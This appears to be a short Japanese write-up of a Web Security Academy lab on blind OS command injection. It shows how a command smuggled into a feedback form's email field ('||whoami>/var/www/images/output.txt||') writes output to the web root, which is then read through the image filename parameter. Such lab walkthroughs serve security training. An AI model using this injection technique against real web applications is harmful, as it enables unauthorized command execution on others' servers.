academy OSコマンドインジェクション 3問目 出力リダイレクトによるブラインドOSコマンドインジェクション

Lab: Blind OS command injection with output redirection

Submit feedbackをクリック

適当に入力して、submit feedbackボタン

POST /feedback/submit　をリピータに

emailパラメータを
email=||whoami>/var/www/images/output.txt||
に変更、send

製品画像のリクエスト
GET /image?filename=x.jpg
をリピータに
（historyのfilterでimageにチェックいる）

filename=output.txt に書き換えて、send

レスポンスに、ユーザー名らしき文字が表示されてる
クリア！

–)v